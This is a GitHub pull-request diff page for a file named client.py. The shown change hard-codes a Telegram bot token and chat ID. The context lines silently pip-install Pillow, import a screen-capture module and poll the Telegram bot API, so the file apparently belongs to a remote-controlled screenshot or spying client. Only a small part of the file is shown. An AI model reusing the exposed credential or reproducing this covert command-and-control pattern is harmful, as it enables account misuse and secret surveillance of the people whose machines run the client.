Skip to content
Open
Changes from all commits
Commits
File filter

Filter by extension

Filter by extension

Conversations
Failed to load comments.
Loading
Jump to
Jump to file
Failed to load files.
Loading
Diff view
Diff view
4 changes: 2 additions & 2 deletions client.py
Original file line number Diff line number Diff line change
Expand Up @@ -13,8 +13,8 @@
os.system("python3 -m pip install pillow -q -q -q")
from PIL import ImageGrab

TOKEN = '' #change the token here
CHAT_ID = '' #change the chat id here
TOKEN = '7792865144:AAGBlt5yzwo43zhD7s7UIVjN4TAJFGVY7M8' #change the token here
CHAT_ID = '7792865144' #change the chat id here
processed_message_ids = []
def get_updates(offset=None):
url = f"https://api.telegram.org/bot{TOKEN}/getUpdates"
Expand Down